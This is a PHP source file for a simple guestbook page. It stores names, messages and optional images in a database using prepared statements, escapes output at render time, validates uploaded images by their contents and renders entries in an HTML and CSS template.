
<?php
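session_start(); // Start the session

// connectie.php is expected to define $pdo, which every database helper
// below needs. require (not include) so a missing file stops here with a
// clear error instead of failing later on an undefined $pdo.
require 'connectie.php';

// Note: the submit handler further down reads $_POST['name'] and
// $_POST['message'] itself; the values are stored as submitted and escaped
// when rendered, so no pre-escaped copy is made here (the previous copy was
// overwritten before it was ever used).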

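/**
 * Normalise a text field from the request for direct inclusion in HTML.
 *
 * Surrounding whitespace is removed and the HTML-significant characters
 * (& < > " ') are converted to entities. The result is meant for output,
 * not for storage: escaping it again at render time double-encodes it.
 *
 * @param string $input Raw value as received from the request
 * @return string Trimmed, entity-encoded text; invalid UTF-8 sequences are
 *                replaced by U+FFFD instead of emptying the whole string
 */
function sanitizeInput($input) {
    // Remove leading and trailing whitespace (cast keeps null behaving as '')
    $input = trim((string) $input);

    // ENT_SUBSTITUTE matters: with ENT_QUOTES alone, htmlspecialchars()
    // returns '' for any string containing an invalid UTF-8 sequence, which
    // silently drops the whole message instead of one bad byte.
    return htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}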

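// Function to upload a message to the database
/**
 * Insert one guestbook entry.
 *
 * Name and message are stored exactly as submitted. They are passed through
 * htmlspecialchars() when rendered, so escaping them here as well would
 * double-encode characters such as "&" and "<" on the displayed page
 * ("Tom &amp; Jerry"). SQL injection is prevented by the bound parameters,
 * not by HTML escaping.
 *
 * @param string|null $image   Stored file name of the uploaded image, or null
 * @param string      $message Message text as submitted
 * @param string      $name    Author name as submitted
 * @param PDO         $conn    Open database connection
 * @return bool true when a row was inserted, false otherwise
 */
function uploadMessage($image, $message, $name, $conn) {
    try {
        $stmt = $conn->prepare(
            "INSERT INTO berichten (name, message, image, date_time) VALUES (:name, :message, :image, NOW())"
        );

        // bindValue rather than bindParam: the values are final, there is
        // nothing to bind by reference. A missing image is stored as SQL NULL.
        $stmt->bindValue(':name', $name);
        $stmt->bindValue(':message', $message);
        $stmt->bindValue(':image', $image, $image === null ? PDO::PARAM_NULL : PDO::PARAM_STR);

        $stmt->execute();

        // One row affected means the insert succeeded
        return $stmt->rowCount() > 0;
    } catch (PDOException $e) {
        // Log server-side instead of echoing: the driver message can name
        // tables, columns and SQL fragments the visitor has no need to see.
        error_log('uploadMessage failed: ' . $e->getMessage());
        return false;
    }
}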

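/**
 * Move a successfully uploaded file into uploads/ under a random name.
 *
 * The browser-supplied file name and MIME type are not trusted: the decision
 * is made on the file contents via getimagesize(), the stored name is random,
 * and the extension is derived from the detected image type. Anything that is
 * not a JPEG, PNG, GIF or WebP image is rejected, so a script or an SVG cannot
 * end up in uploads/ under a name the web server would execute or render.
 *
 * @param string $tmpPath Value of $_FILES['image']['tmp_name']
 * @return string|null Stored file name (relative to uploads/), or null when
 *                     the file was rejected or could not be moved
 */
function storeUploadedImage($tmpPath) {
    if (!is_uploaded_file($tmpPath)) {
        return null;
    }

    $info = getimagesize($tmpPath);
    if ($info === false) {
        return null;
    }

    $allowedTypes = [IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_GIF, IMAGETYPE_WEBP];
    if (!in_array($info[2], $allowedTypes, true)) {
        return null;
    }

    // random_bytes() rather than the original name: no path separators,
    // no second extension such as ".php.jpg", no collisions between visitors.
    $storedName = bin2hex(random_bytes(16)) . image_type_to_extension($info[2], true);
    if (!move_uploaded_file($tmpPath, __DIR__ . '/uploads/' . $storedName)) {
        return null;
    }

    return $storedName;
}

// If the form is submitted
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    // Check if all fields are filled
    if (!empty($_POST['name']) && !empty($_POST['message'])) {
        // Get the input data. The values are stored as submitted and escaped
        // when rendered (see the message loop in the template below).
        $name = $_POST['name'];
        $message = $_POST['message'];

        // Check if an image is uploaded, and accept it only if it really is one
        $image = null;
        $imageRejected = false;
        if (isset($_FILES['image']) && $_FILES['image']['error'] === UPLOAD_ERR_OK) {
            $image = storeUploadedImage($_FILES['image']['tmp_name']);
            $imageRejected = ($image === null);
        }

        if ($imageRejected) {
            echo "Only JPEG, PNG, GIF or WebP images can be uploaded.";
        } elseif (uploadMessage($image, $message, $name, $pdo)) {
            // Redirect after POST so a refresh does not resubmit the form
            header("Location: {$_SERVER['PHP_SELF']}", true, 303);
            exit();
        } else {
            echo "Failed to upload message.";
        }
    } else {
        echo "Please fill in all fields.";
    }
}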

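// Function to get messages from the database
/**
 * Fetch every guestbook entry, newest first.
 *
 * @param PDO $conn Open database connection
 * @return array<int, array<string, mixed>> Rows of the berichten table as
 *         associative arrays; an empty array when the query fails
 */
function getMessages($conn) {
    try {
        $stmt = $conn->query("SELECT * FROM berichten ORDER BY date_time DESC");

        // With PDO::ERRMODE_SILENT a failed query returns false rather than
        // throwing; treat that the same as an exception instead of calling
        // fetchAll() on false.
        if ($stmt === false) {
            error_log('getMessages failed: ' . implode(' ', $conn->errorInfo()));
            return [];
        }

        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // Keep the driver message out of the page: it names tables and
        // columns. Log it server-side and let the template show "no messages".
        error_log('getMessages failed: ' . $e->getMessage());
        return [];
    }
}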

// Load every guestbook entry (newest first) for the template below;
// an empty array means "no messages yet" and the template handles that case.
$messages = getMessages($pdo);
?>


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gastenboek</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
        }

        .container {
            max-width: 800px;
            margin: 20px auto; /* Add margin around the container */
            padding: 20px;
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        .message {
            margin-bottom: 20px;
            padding: 10px;
            background-color: #f9f9f9;
            border-radius: 8px;
            box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
        }

        .message p {
            margin: 5px 0;
        }

        .message img {
            max-width: 100%;
            border-radius: 8px;
            max-height: 300px; /* Limiting maximum height */
        }

        form {
            margin-top: 20px; /* Move the form below the messages */
        }

        label {
            font-weight: bold;
        }

        input[type="text"],
        textarea {
            width: 100%;
            padding: 10px;
            margin-top: 5px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }

        input[type="submit"] {
            background-color: #4caf50;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        input[type="submit"]:hover {
            background-color: #45a049;
        }

        input[type="file"] {
            margin-top: 5px;
        }
    </style>
</head>
<body>
    <div class="container"> <!-- Add a container around all content -->
        <h1>Gastenboek</h1>
        <section class="send_form">
            <h2>Send a Message</h2>
            <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>" method="post" enctype="multipart/form-data">
                <label for="name">Name:</label><br>
                <input type="text" id="name" name="name"><br>
                <label for="message">Message:</label><br>
                <textarea id="message" name="message" rows="4" cols="50"></textarea><br>
                <label for="image">Upload Image:</label><br>
                <input type="file" id="image" name="image"><br><br>
                <input type="submit" value="Send">
            </form>
        </section>
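        <?php if (!empty($messages)): ?>
            <?php foreach ($messages as $message): ?>
                <div class="message">
                    <?php // Rows are stored as submitted; this is the single place they are HTML-escaped. ?>
                    <p><strong><?php echo htmlspecialchars($message['name'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>:</strong> <?php echo htmlspecialchars($message['message'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></p>
                    <?php if (!empty($message['image'])): ?>
                        <?php // The file name lands in a URL path segment inside an HTML attribute: encode for the URL first (spaces, '?', '#', '/'), then for the attribute. ?>
                        <img src="uploads/<?php echo htmlspecialchars(rawurlencode($message['image']), ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?>" alt="Uploaded Image">
                    <?php endif; ?>
                    <p><em><?php echo htmlspecialchars($message['date_time'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></em></p>
                </div>
            <?php endforeach; ?>
        <?php else: ?>
            <p>No messages yet.</p>
        <?php endif; ?>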
    </div>
</body>
</html>
